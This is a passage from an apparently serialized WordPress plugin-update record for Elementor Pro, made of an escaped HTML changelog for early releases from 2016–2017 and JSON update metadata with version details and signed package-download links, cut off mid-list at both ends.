Forms<\\/li>\\n<li>New: Added ActiveCampaign integration to Forms<\\/li>\\n<li>New: Added ConverKit integration to Forms<\\/li>\\n<li>New: Added GetResponse integration to Forms<\\/li>\\n<li>New: Added form <code>id<\\/code>, <code>name<\\/code> attributes to handle integration with auto collectors like HubSpot<\\/li>\\n<li>New: Added Global API key for MailChimp to improve the workflow<\\/li>\\n<li>Tweak: Better error handling and message display for Forms<\\/li>\\n<li>Fix: PHP notice Undefined variable <code>$cc_header<\\/code> (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/2934\\\">#2934<\\/a>)<\\/li>\\n<\\/ul>\\n<h4>1.11.0 - 2017-12-11<\\/h4>\\n<ul>\\n<li>New: Added a native Comments widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/543\\\">#543<\\/a>)<\\/li>\\n<li>New: Added an Author Box widget<\\/li>\\n<li>New: Added a Post Navigation widget<\\/li>\\n<li>New: Added a Yoast Breadcrumbs widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/2749\\\">#2749<\\/a>)<\\/li>\\n<li>Tweak: Added a close button to search widget under Full Screen skin (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/2762\\\">#2762<\\/a>)<\\/li>\\n<li>Fix: Allow currency symbol to appear even if price isn\'t numeric<\\/li>\\n<li>Fix: Edge cases when the nav menu is empty in a stretched section<\\/li>\\n<li>Fix: Added fallback when you remove the <code>space-between<\\/code> on Swiper carousel<\\/li>\\n<\\/ul>\\n<h4>1.10.2 - 2017-12-03<\\/h4>\\n<ul>\\n<li>Fix: Missing save widget icon (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/2878\\\">#2878<\\/a>)<\\/li>\\n<li>Fix: Global widgets not saving edits (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/2874\\\">#2874<\\/a>)<\\/li>\\n<li>Fix: Removed <code>white-space: nowrap;<\\/code> property from vertical menu in Nav Menu widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/2815\\\">#2815<\\/a>)<\\/li>\\n<\\/ul>\\n<h4>1.10.1 - 2017-11-30<\\/h4>\\n<ul>\\n<li>Tweak: Added default value for search form<\\/li>\\n<li>Tweak: Order template list A-Z in the library widget<\\/li>\\n<li>Tweak: get_users\\/authors query is now done using AJAX only, for better performance in Query Control (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/2865\\\">#2865<\\/a>)<\\/li>\\n<li>Fix: When adding <code>.00<\\/code> it is not displayed on the front<\\/li>\\n<li>Fix: Make sure space between is numeric for carousel control<\\/li>\\n<li>Fix: Added space for radio & checkbox fields in form widget<\\/li>\\n<\\/ul>\\n<h4>1.10.0 - 2017-11-15<\\/h4>\\n<ul>\\n<li>New: Added native Search form widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/2576\\\">#2576<\\/a>)<\\/li>\\n<li>Tweak: Added Slides To Scroll & Loop controls to Media Carousel and Testimonials widgets<\\/li>\\n<li>Tweak: Added Inline editing to Blockquote widget<\\/li>\\n<li>Fix: Animated Headline color bug (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/2516\\\">#2516<\\/a>)<\\/li>\\n<li>Fix: Animated Headline with Rotating skin<\\/li>\\n<li>Fix: RTL fix for Animated Headline widget in \'typing\' and \'clip\' animations<\\/li>\\n<li>Fix: Empty menu cause jQuery to crash in Menu widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/2662\\\">#2662<\\/a>)<\\/li>\\n<li>Fix: Custom CSS gone after reloading the editor<\\/li>\\n<\\/ul>\\n<h4>1.9.5 - 2017-10-27<\\/h4>\\n<ul>\\n<li>Fix: Broken Global widget with JS (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/2639\\\">#2639<\\/a>)<\\/li>\\n<\\/ul>\\n<h4>1.9.4 - 2017-10-24<\\/h4>\\n<ul>\\n<li>Tweak: Improved UI for notices and license page<\\/li>\\n<li>Fix: Update system conflict with other EDD plugins<\\/li>\\n<li>Fix: WooCommerce frontend hooks on Elementor editor (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/2577\\\">#2577<\\/a>)<\\/li>\\n<li>Fix: Removed default border left in Nav Menu dropdown CSS (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/2496\\\">#2496<\\/a>)<\\/li>\\n<li>Fix: Increased submenu max-width (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/2558\\\">#2558<\\/a>)<\\/li>\\n<li>Fix: Save global templates without their defaults<\\/li>\\n<li>Fix: Horizontal scrolling issue with posts grid<\\/li>\\n<\\/ul>\\n<h4>1.9.3 - 2017-10-03<\\/h4>\\n<ul>\\n<li>Fix: Condition slide style that got affected by previous update<\\/li>\\n<\\/ul>\\n<h4>1.9.2 - 2017-10-02<\\/h4>\\n<ul>\\n<li>New: Added integration with MailPoet 3 for Forms actions<\\/li>\\n<li>Fix: Removed height control from Testimonial carousel in mobile editing mode<\\/li>\\n<li>Fix: Removed bottom padding when there\'s no pagination in Testimonial carousel<\\/li>\\n<li>Fix: Added condition for slides style section in skin bubble mode<\\/li>\\n<li>Fix: Slides per view control for mobile editing in Testimonial carousel<\\/li>\\n<li>Fix: Navigation Arrows icons matched with common Elementor Navigation Arrows<\\/li>\\n<\\/ul>\\n<h4>1.9.1 - 2017-09-28<\\/h4>\\n<ul>\\n<li>Fix: Slides per view for slideshow carousel<\\/li>\\n<li>Fix: Final polish for the new Testimonial Carousel widget<\\/li>\\n<li>Fix: Don\'t play video if slide type is not video<\\/li>\\n<li>Fix: Removed slides style section condition (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/2497\\\">#2497<\\/a>)<\\/li>\\n<li>Fix: Set cursor as pointer for slideshow thumbnails<\\/li>\\n<\\/ul>\\n<h4>1.9.0 - 2017-09-26<\\/h4>\\n<ul>\\n<li>New: Added Media Carousel widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/216\\\">#216<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/347\\\">#347<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/2209\\\">#2209<\\/a>)<\\/li>\\n<li>New: Added Testimonial Carousel widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/715\\\">#715<\\/a>)<\\/li>\\n<\\/ul>\\n<h4>1.8.3 - 2017-09-24<\\/h4>\\n<ul>\\n<li>Fix: Added compatibility for WordPress 4.8.2 & 4.7.6<\\/li>\\n<li>Fix: Remove slashes from Form sent data<\\/li>\\n<\\/ul>\\n<h4>1.8.2 - 2017-09-19<\\/h4>\\n<ul>\\n<li>Tweak: Added target URL for the tweet message in Blockquote widget<\\/li>\\n<li>Tweak: Render the slide height before the slider is finished loading<\\/li>\\n<li>Fix: Space between words for Animated Headline widget<\\/li>\\n<li>Fix: RTL compatibility for Animated Headline widget<\\/li>\\n<li>Fix: Italic font style for Animated Headline widget<\\/li>\\n<li>Fix: Excluded Menu widget from the WP Editor text rendering<\\/li>\\n<\\/ul>\\n<h4>1.8.1 - 2017-09-18<\\/h4>\\n<ul>\\n<li>Fix: WCAG Compatible "required" field attribute for W3C validation (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/2391\\\">#2391<\\/a>)<\\/li>\\n<li>Fix: Print the main menu only when is necessary in Menu widget<\\/li>\\n<li>Fix: Use CSS media query instead of JS to hide items in Menu widget to avoid flickering on page load (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/2381\\\">#2381<\\/a>)<\\/li>\\n<\\/ul>\\n<h4>1.8.0 - 2017-09-12<\\/h4>\\n<ul>\\n<li>New: Added Nav Menu widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/1406\\\">#1406<\\/a>)<\\/li>\\n<li>Fix: Field ID for checkbox control in Form widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/2279\\\">#2279<\\/a>)<\\/li>\\n<li>Fix: Style for Blockquote widget included<\\/li>\\n<\\/ul>\\n<h4>1.7.2 - 2017-09-07<\\/h4>\\n<ul>\\n<li>Tweak: Loading Facebook SDK via JS for better compatibility with caching plugins<\\/li>\\n<li>Fix: Responsive Embed Facebook post widget for Safari iOS (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/2340\\\">#2340<\\/a>)<\\/li>\\n<\\/ul>\\n<h4>1.7.1 - 2017-09-05<\\/h4>\\n<ul>\\n<li>Fix: Facebook SDK version<\\/li>\\n<\\/ul>\\n<h4>1.7.0 - 2017-09-05<\\/h4>\\n<ul>\\n<li>New: Added Facebook Button widget for Like, Recommend, Share and Follow<\\/li>\\n<li>New: Added Facebook Embed widget for Post, Video and Comment<\\/li>\\n<li>New: Added Facebook Comments widget<\\/li>\\n<li>New: Added Facebook Page widget (Previously known as Like Box)<\\/li>\\n<li>New: Added Blockquote widget with Tweet button<\\/li>\\n<li>Tweak: Added Facebook SDK integration for all Facebook widgets<\\/li>\\n<li>Fix: Animated headline rotating with long words<\\/li>\\n<\\/ul>\\n<h4>1.6.1 - 2017-08-28<\\/h4>\\n<ul>\\n<li>Fix: Animated Headline marker gets in front of neighboring spans even when "Bring to Front" is not set<\\/li>\\n<li>Fix: Stroke animation in Animated Headline for MS Edge browser<\\/li>\\n<li>Fix: Animated headline with more than 1-word per rotation<\\/li>\\n<li>Fix: Animated Headline in two lines<\\/li>\\n<li>Fix: Some errors in Global widget<\\/li>\\n<\\/ul>\\n<h4>1.6.0 - 2017-08-22<\\/h4>\\n<ul>\\n<li>New: Added Animated Headline widget<\\/li>\\n<li>New: Added Hidden field for Forms widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/2038\\\">#2038<\\/a>)<\\/li>\\n<li>Tweak: Added notice to update Elementor to v1.6.5 or higher<\\/li>\\n<li>Fix: CSS Animations names no longer minified, in order to prevent unexpected conflicts<\\/li>\\n<\\/ul>\\n<h4>1.5.9 - 2017-08-16<\\/h4>\\n<ul>\\n<li>Tweak: Added compatibility for the future release of Elementor v1.7<\\/li>\\n<li>Fix: Portfolio compatibility for GeneratePress theme<\\/li>\\n<li>Fix: Portfolio filter compatibility for RTL<\\/li>\\n<li>Fix: Pagination apply for all posts widget in the page<\\/li>\\n<li>Fix: Global form widget with MailChimp integration not saving<\\/li>\\n<\\/ul>\\n<h4>1.5.8 - 2017-07-25<\\/h4>\\n<ul>\\n<li>Tweak: Added compatibility for the future release of Elementor v1.6<\\/li>\\n<li>Fix: Improved backward compatibility for query control rename<\\/li>\\n<\\/ul>\\n<h4>1.5.7 - 2017-07-24<\\/h4>\\n<ul>\\n<li>Tweak: Moved JS render of reCAPTCHA to a separate file<\\/li>\\n<li>Tweak: Display the label in the reCAPTCHA field for better experience<\\/li>\\n<li>Tweak: Rename <code>panel-posts-control<\\/code> to <code>query-control<\\/code> and added fallback support<\\/li>\\n<li>Tweak: Added compatibility for the future release of Elementor with history feature<\\/li>\\n<li>Fix: reCAPTCHA preview on the editor<\\/li>\\n<li>Fix: Manual selection (query control) has stopped working after saving (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/2000\\\">#2000<\\/a>)<\\/li>\\n<li>Fix: Added condition for icon size control in Share Buttons widget<\\/li>\\n<\\/ul>\\n<h4>1.5.6 - 2017-07-12<\\/h4>\\n<ul>\\n<li>Fix: Query Control correction for taxonomies (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/1963\\\">#1963<\\/a>)<\\/li>\\n<li>Fix: Custom CSS override scheme color in the editor<\\/li>\\n<li>Fix: Added order by Menu Order for Query Control in WC widget<\\/li>\\n<li>Fix: Glitch with Flip Box background overlay<\\/li>\\n<\\/ul>\\n<h4>1.5.5 - 2017-07-03<\\/h4>\\n<ul>\\n<li>Tweak: Moved reCAPTCHA render to handler & load only if a form is exist<\\/li>\\n<li>Fix: MailChimp integration: Default number of items returned by API increased to 999<\\/li>\\n<li>Fix: MailChimp integration: Refresh the groups list if API is changed<\\/li>\\n<li>Fix: Sorted items in filter bar by A-Z<\\/li>\\n<li>Fix: Editor glitch with Elementor v1.5 (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/1927\\\">#1927<\\/a>)<\\/li>\\n<\\/ul>\\n<h4>1.5.4 - 2017-06-22<\\/h4>\\n<ul>\\n<li>Tweak: Improved compatibility for Elementor v1.5<\\/li>\\n<li>Fix: URL default for Add To Cart widget<\\/li>\\n<li>Fix: Allowed <code>date<\\/code> and <code>birthday<\\/code> fields as text for MailChimp integration<\\/li>\\n<\\/ul>\\n<h4>1.5.3 - 2017-06-19<\\/h4>\\n<ul>\\n<li>Tweak: Make flip-box height responsive control<\\/li>\\n<li>Fix: Facebook share count now gets retrieved by Elementor (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/1829\\\">#1829<\\/a>)<\\/li>\\n<li>Fix: Global form widget with MailChimp integration not saving<\\/li>\\n<\\/ul>\\n<h4>1.5.2 - 2017-06-13<\\/h4>\\n<ul>\\n<li>Fix: Custom CSS panel location compatibility for the old versions<\\/li>\\n<\\/ul>\\n<h4>1.5.1 - 2017-06-12<\\/h4>\\n<ul>\\n<li>Fix: MailChimp update existing user registration<\\/li>\\n<li>Fix: Global widget with JS in the editor mode<\\/li>\\n<li>Fix: Label section condition in Login widget<\\/li>\\n<li>Fix: Changes to unlinked global widget do not appear in the editor<\\/li>\\n<\\/ul>\\n<h4>1.5.0 - 2017-05-23<\\/h4>\\n<ul>\\n<li>New: Added Cards, a new skin for Posts widget<\\/li>\\n<li>New: Added Exclude option to post query control group<\\/li>\\n<li>Tweak: Added <code>post_class()<\\/code> for each post in the loop<\\/li>\\n<li>Tweak: Added <code>.elementor-posts-masonry<\\/code> class when Masonry layout is enabled<\\/li>\\n<li>Tweak: Added compatibility for the next release of Elementor v1.5.0<\\/li>\\n<li>Tweak: CSS <code>autoprefixer<\\/code> now supports last 5 versions of browsers<\\/li>\\n<li>Tweak: Added <code>imageLoaded<\\/code> library for Posts & Portfolio widgets<\\/li>\\n<\\/ul>\\n<h4>1.4.4 - 2017-05-18<\\/h4>\\n<ul>\\n<li>Fix: Force Mailchimp API to return all lists and not just 10 (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/1683\\\">#1683<\\/a>)<\\/li>\\n<li>Fix: Added <code>.elementor-form<\\/code> class to Login form to fix style glitch<\\/li>\\n<\\/ul>\\n<h4>1.4.3 - 2017-05-14<\\/h4>\\n<ul>\\n<li>Tweak: Added Redirect After Login option to Login widget<\\/li>\\n<li>Tweak: Stay in the current page after logout in Login widget<\\/li>\\n<li>Tweak: Preparation for Elementor settings tabs in future version<\\/li>\\n<li>Fix: Pinterest in Share Buttons widget now sharing the URL alone<\\/li>\\n<li>Fix: Bug with <code>active<\\/code> class in portfolio filter item<\\/li>\\n<li>Fix: Higher specific list-style-type <code>none<\\/code> for filter items to override some theme style<\\/li>\\n<\\/ul>\\n<h4>1.4.2 - 2017-05-06<\\/h4>\\n<ul>\\n<li>Fix: Temporary patch for form field shortcode in some servers<\\/li>\\n<\\/ul>\\n<h4>1.4.1 - 2017-05-03<\\/h4>\\n<ul>\\n<li>Fix: Bug with custom success message in form widget<\\/li>\\n<li>Fix: Bug with meta data in email action<\\/li>\\n<\\/ul>\\n<h4>1.4.0 - 2017-05-03<\\/h4>\\n<ul>\\n<li>New: Forms: integration with MailChimp<\\/li>\\n<li>New: Forms: integration with MailPoet<\\/li>\\n<li>New: Forms: Added Email 2 action for email confirmation<\\/li>\\n<li>New: Forms: Added shortcodes for fields<\\/li>\\n<li>New: Forms: Added custom ID for fields<\\/li>\\n<li>New: Forms: Added option to edit email HTML template (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/1180\\\">#1180<\\/a>)<\\/li>\\n<li>New: Added Login widget<\\/li>\\n<li>Tweak: Move <code>send_html<\\/code> control to <code>email_content_type<\\/code><\\/li>\\n<li>Fix: Email still sent even if validation failed in form widget<\\/li>\\n<\\/ul>\\n<h4>1.3.2 - 2017-05-01<\\/h4>\\n<ul>\\n<li>New: Added action <code>elementor_pro\\/init<\\/code> for better integration with Elementor Pro<\\/li>\\n<li>Fix: Posts without featured image in Posts widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/1234\\\">#1234<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/1382\\\">#1382<\\/a>)<\\/li>\\n<li>Fix: reCAPTCHA & Honeypot fields with new method<\\/li>\\n<li>Fix: Added border width control in Share Buttons to avoid a glitch on Chrome browser<\\/li>\\n<li>Fix: Border radius glitch on hover in Share Buttons<\\/li>\\n<\\/ul>\\n<h4>1.3.1 - 2017-04-25<\\/h4>\\n<ul>\\n<li>Fix: Conflict update with revision history module<\\/li>\\n<\\/ul>\\n<h4>1.3.0 - 2017-04-25<\\/h4>\\n<ul>\\n<li>New: Added Share Buttons widget (<a href=\\\"https:\\/\\/wordpress.org\\/support\\/topic\\/social-sharing-buttons-is-it-possible\\/\\\">Topic<\\/a>)<\\/li>\\n<li>New: Added Custom CSS for Page Settings<\\/li>\\n<li>New: Added Masonry layout for Portfolio widget<\\/li>\\n<li>New: Added Cc & Bcc options to email action (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/1181\\\">#1181<\\/a>)<\\/li>\\n<li>New: Introduced <code>ElementorProModulesFormsClassesAction_Base<\\/code> class for better 3rd party integration for forms<\\/li>\\n<li>Tweak: Debugger module now also shows errors from Pro<\\/li>\\n<li>Tweak: Added options for Elementor Library<\\/li>\\n<li>Tweak: New base posts module for optimized performance<\\/li>\\n<li>Tweak: Adjusting Posts \\/ Portfolio to the new structure<\\/li>\\n<li>Fix: Export for posts \\/ portfolio<\\/li>\\n<li>Fix: Duplicate repeater field with switcher control (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/1442\\\">#1442<\\/a>)<\\/li>\\n<li>Fix: Post per Page in the query control<\\/li>\\n<li>Fix: Metadata does not come through on form emails (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/1566\\\">#1566<\\/a>)<\\/li>\\n<\\/ul>\\n<h4>1.2.6 - 2017-04-19<\\/h4>\\n<ul>\\n<li>Fix: Added compatibility with WooCommerce 3.0 - Products & Add to Cart widgets<\\/li>\\n<\\/ul>\\n<h4>1.2.5 - 2017-04-18<\\/h4>\\n<ul>\\n<li>Fix: Offset query for posts widgets (Posts, Portfolio and Products)<\\/li>\\n<\\/ul>\\n<h4>1.2.4 - 2017-03-21<\\/h4>\\n<ul>\\n<li>Tweak: Added Indian Rupee sign to Price Table widget<\\/li>\\n<li>Fix: Portfolio grid for IE11<\\/li>\\n<li>Fix: Link target blank in Price List widget<\\/li>\\n<li>Fix: Active item for filter bar in Portfolio widget<\\/li>\\n<\\/ul>\\n<h4>1.2.3 - 2017-03-06<\\/h4>\\n<ul>\\n<li>Tweak: Fully compatible with Elementor v1.3.0<\\/li>\\n<li>Tweak: Added trigger for after form submission in Forms widget<\\/li>\\n<li>Tweak: Changed handle name in reCAPTCHA field to avoid conflict with other contact forms<\\/li>\\n<li>Fix: Portfolio filter syntax in Non-Latin languages<\\/li>\\n<li>Fix: Added <code>no-repeat<\\/code> property for slide with <code>background-size:contain<\\/code><\\/li>\\n<li>Fix: Condition control & Import value in Posts widgets<\\/li>\\n<li>Fix: Offset and Pagination in WordPress (<a href=\\\"https:\\/\\/codex.wordpress.org\\/Making_Custom_Queries_using_Offset_and_Pagination\\\">More Info<\\/a>)<\\/li>\\n<li>Fix: Submit handler bubbling for custom events in Forms widget<\\/li>\\n<\\/ul>\\n<h4>1.2.2 - 2017-02-23<\\/h4>\\n<ul>\\n<li>Tweak: Change name from Side A\\/B to Front and Back in Flip Box widget<\\/li>\\n<li>Fix: Error when saving third party widgets in the global widget<\\/li>\\n<li>Fix: Image position "none" remains visible in editor preview (Posts)<\\/li>\\n<li>Fix: Hide the pagination when there are no links<\\/li>\\n<\\/ul>\\n<h4>1.2.1 - 2017-02-21<\\/h4>\\n<ul>\\n<li>Fix: Firefox Flip Box 3D compatibility<\\/li>\\n<\\/ul>\\n<h4>1.2.0 - 2017-02-21<\\/h4>\\n<ul>\\n<li>New: Added Flip Box widget<\\/li>\\n<li>New: Added Ken Burns effect for slides<\\/li>\\n<li>New: Added Masonry layout for Posts widget<\\/li>\\n<li>New: Added Pagination option for Posts widget<\\/li>\\n<li>Tweak: Added background size contain to slides<\\/li>\\n<li>Tweak: Improve Query control by preload items<\\/li>\\n<li>Fix: Text color for Checkbox and Radio fields<\\/li>\\n<\\/ul>\\n<h4>1.1.2 - 2017-02-05<\\/h4>\\n<ul>\\n<li>Tweak: Added <code>aria-required<\\/code> for better accessibility in forms widget<\\/li>\\n<li>Fix: Conflict Call to <code>undefined<\\/code> method in Posts & Portfolio widgets (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/1271\\\">#1271<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/1266\\\">#1266<\\/a>)<\\/li>\\n<li>Fix: Submit button HTML after error sending<\\/li>\\n<li>Fix: Success message for <code>skip_email<\\/code> function<\\/li>\\n<li>Notice: Elementor 1.2.0 or later now required<\\/li>\\n<\\/ul>\\n<h4>1.1.1 - 2017-01-24<\\/h4>\\n<ul>\\n<li>Fix: Can\'t save global widgets when <code>WP_DEBUG<\\/code> is <code>true<\\/code><\\/li>\\n<li>Fix: Undefined variable in WC widgets<\\/li>\\n<li>Fix: Removed duplicate strings<\\/li>\\n<\\/ul>\\n<h4>1.1.0 - 2017-01-24<\\/h4>\\n<ul>\\n<li>New: Price Table widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/102\\\">#102<\\/a>)<\\/li>\\n<li>New: WooCommerce Add to Cart widget<\\/li>\\n<li>New: WooCommerce Categories widget<\\/li>\\n<li>New: WooCommerce Elements widget<\\/li>\\n<li>New: Honeypot field for Forms widgets<\\/li>\\n<li>Tweak: Added inline options for taxonomies & authors if is less than 15 items<\\/li>\\n<li>Tweak: Added Required Mark for fields in Forms widget<\\/li>\\n<li>Fix: CSS selectors priority in Slides widget<\\/li>\\n<li>Fix: CSS bug in Price List widget<\\/li>\\n<li>Fix: Update all Post CSS files that includes specific Global Widget<\\/li>\\n<\\/ul>\\n<h4>1.0.9 - 2017-01-18<\\/h4>\\n<ul>\\n<li>Fix: Auto complete bug in query controls<\\/li>\\n<li>Fix: Render template with escaping slashes<\\/li>\\n<li>Fix: Reply-to field in Forms widget<\\/li>\\n<\\/ul>\\n<h4>1.0.8 - 2017-01-11<\\/h4>\\n<ul>\\n<li>Tweak: Code adjustments for Elementor API<\\/li>\\n<li>Fix: Removed go pro link from plugins page in admin<\\/li>\\n<\\/ul>\\n<h4>1.0.7 - 2017-01-05<\\/h4>\\n<ul>\\n<li>Tweak: Added filter by featured \\/ sale for WC Products widget<\\/li>\\n<li>Tweak: Added author control in Portfolio widget<\\/li>\\n<li>Tweak: Code adjustments for Elementor API<\\/li>\\n<li>Fix: Added support for empty image ratio<\\/li>\\n<li>Fix: Avoid nesting a sidebar within a template that will appear in the sidebar itself<\\/li>\\n<\\/ul>\\n<h4>1.0.6 - 2017-01-01<\\/h4>\\n<ul>\\n<li>Tweak: Added Auto-updates for local translation files<\\/li>\\n<li>Fix: Custom CSS for Global widgets<\\/li>\\n<li>Fix: Remove <code>nonce<\\/code> field (Fix some cache plugins)<\\/li>\\n<\\/ul>\\n<h4>1.0.5 - 2016-12-27<\\/h4>\\n<ul>\\n<li>Fix: Slide element bug fix - \'Link apply on\' logic<\\/li>\\n<li>Fix: Removed unique wrapper for Custom CSS in order to allow media queries (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/1086\\\">#1086<\\/a>)<\\/li>\\n<\\/ul>\\n<h4>1.0.4 - 2016-12-21<\\/h4>\\n<ul>\\n<li>Tweak: Mobile Editing for fields in the form widget<\\/li>\\n<li>Tweak: Mobile Editing for posts<\\/li>\\n<li>Tweak: Allow send form as HTML<\\/li>\\n<li>Tweak: Improved auto upgrades for Multisite installation<\\/li>\\n<li>Tweak: Improve editor rendering experience for Portfolio widget<\\/li>\\n<li>Fix: Posts widget check if image exist<\\/li>\\n<li>Fix: Changed the clone method for global widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/1042\\\">#1042<\\/a>)<\\/li>\\n<li>Fix: Bug slides in RTL (removed direction control)<\\/li>\\n<li>Fix: Slides with no height jumps when changing slides<\\/li>\\n<\\/ul>\\n<h4>1.0.3 - 2016-12-13<\\/h4>\\n<ul>\\n<li>Fix: Added escape placeholder for HTML Entities in form widget<\\/li>\\n<li>Fix: Countdown widget RTL bug<\\/li>\\n<li>Fix: Remove redundant #elementor selector for control style<\\/li>\\n<li>Fix: Added prefixing with \'0\' for one digit number in Countdown widget<\\/li>\\n<\\/ul>\\n<h4>1.0.2 - 2016-12-12<\\/h4>\\n<ul>\\n<li>Fix: Page layout collapses when inserting reCAPTCHA field in Form<\\/li>\\n<\\/ul>\\n<h4>1.0.1 - 2016-12-12<\\/h4>\\n<ul>\\n<li>Fix: WordPress widgets disappear from Editor when Elementor Pro active<\\/li>\\n<\\/ul>\\n<h4>1.0.0 - 2016-12-12<\\/h4>\\n<ul>\\n<li>Initial release<\\/li>\\n<\\/ul>\\\";}\",\"new_version\":\"3.31.2\",\"name\":\"Elementor Pro\",\"slug\":\"elementor-pro\",\"url\":\"https:\\/\\/elementor.com\\/pro\\/changelog\\/\",\"homepage\":\"https:\\/\\/elementor.com\\/pro\\/\",\"requires\":\"5.0\",\"tested\":\"6.8.2\",\"elementor_requires\":\"3.0.1\",\"package\":\"https:\\/\\/plugin-downloads.elementor.com\\/v2\\/package_download\\/eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJsaWNlbnNlIjoiKioqKioqKioqIiwidXJsIjoiaHR0cHM6Ly9pY3RiYW5rLmlyL2Jsb2ciLCJkb3dubG9hZF9iZXRhIjpmYWxzZSwiZmlsZV9rZXkiOiIxIiwiaWF0IjoxNzU2OTE4NDgyLCJleHAiOjE3NTcwMDQ4ODJ9.u3Lwn0TKLzfNJGT3oq6W5qLjXUsrY2DtV_RNGPS4_Ps\\/package_download\",\"download_link\":\"https:\\/\\/plugin-downloads.elementor.com\\/v2\\/package_download\\/eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJsaWNlbnNlIjoiKioqKioqKioqIiwidXJsIjoiaHR0cHM6Ly9pY3RiYW5rLmlyL2Jsb2ciLCJkb3dubG9hZF9iZXRhIjpmYWxzZSwiZmlsZV9rZXkiOiIxIiwiaWF0IjoxNzU2OTE4NDgyLCJleHAiOjE3NTcwMDQ4ODJ9.u3Lwn0TKLzfNJGT3oq6W5qLjXUsrY2DtV_RNGPS4_Ps\\/package_download\",\"banners\":{\"2x\":\"https:\\/\\/ps.w.org\\/elementor\\/assets\\/banner-1544x500.png?rev=1475479\",\"1x\":\"https:\\/\\/ps.w.org\\/elementor\\/assets\\/banner-772x250.png?rev=1475479\"},\"icons\":{\"svg\":\"https:\\/\\/storage.googleapis.com\\/web-public-files\\/Web%20Assets\\/icons\\/icon.svg\"},\"canary_deployment\":{\"plugin_info\":{\"new_version\":\"3.7.0\",\"name\":\"Elementor Pro\",\"slug\":\"elementor-pro\",\"url\":\"https:\\/\\/elementor.com\\/pro\\/changelog\\/\",\"homepage\":\"https:\\/\\/elementor.com\\/pro\\/\",\"requires\":\"5.0\",\"tested\":\"6.8.2\",\"elementor_requires\":\"3.0.1\",\"package\":\"https:\\/\\/plugin-downloads.elementor.com\\/v2\\/previous_download\\/eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJsaWNlbnNlIjoiKioqKioqKioqIiwidmVyc2lvbiI6IjMuNy4wIiwidXJsIjoiaHR0cHM6Ly9pY3RiYW5rLmlyL2Jsb2ciLCJpYXQiOjE3NTY5MTg0ODIsImV4cCI6MTc1NzAwNDg4Mn0.T9xwlvfERo0TEVpKTttrwhVWJFjenpmCTfGyYa5IfVI\\/previous_download\",\"download_link\":\"https:\\/\\/plugin-downloads.elementor.com\\/v2\\/previous_download\\/eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJsaWNlbnNlIjoiKioqKioqKioqIiwidmVyc2lvbiI6IjMuNy4wIiwidXJsIjoiaHR0cHM6Ly9pY3RiYW5rLmlyL2Jsb2ciLCJpYXQiOjE3NTY5MTg0ODIsImV4cCI6MTc1NzAwNDg4Mn0.T9xwlvfERo0TEVpKTttrwhVWJFjenpmCTfGyYa5IfVI\\/previous_download\",\"banners\":{\"2x\":\"https:\\/\\/ps.w.org\\/elementor\\/assets\\/banner-1544x500.png?rev=1475479\",\"1x\":\"https:\\/\\/ps.w.org\\/elementor\\/assets\\/banner-772x250.png?rev=1475479\"},\"icons\":{\"svg\":\"https:\\/\\/storage.googleapis.com\\/web-public-files\\/Web%20Assets\\/icons\\/icon.svg\"}},\"conditions\":[[{\"type\":\"language\",\"languages\":[\"he_IL\",\"nl_NL\",\"en_GB\",\"en_NZ\",\"en_ZA\",\"en_AU\",\"en_CA\",\"sv_SE